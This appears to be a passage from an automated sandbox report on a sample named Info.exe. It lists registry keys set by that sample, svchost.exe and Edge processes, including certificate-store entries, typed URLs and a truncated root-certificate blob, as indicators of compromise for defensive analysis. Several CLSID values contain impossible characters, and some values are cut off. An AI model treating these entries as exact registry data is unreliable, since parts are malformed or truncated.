Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" Info.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs Info.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" Info.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" Info.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" Info.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" Info.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" Info.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" Info.exe -
Modifies registry class 64 IoCs
Processes:
svchost.exeMicrosoftEdge.exeMicrosoftEdgeCP.exesvchost.exesvchost.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "5508" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{20EP1MI0-142C-L17D-YD26-2GCP283P3KMT} svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "5048" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "30" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ} svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{2984096E-0EA7-4987-82C4-6A77CD85E607}" MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC} svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{4F95E550-8299-4FB3-A305-764ABCB8F3FA} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{69RG4ZP0-857P-S13A-ZW93-6DTG316B7ZWC}\650478DC7424C37C\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe -
Processes:
Info.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C Info.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7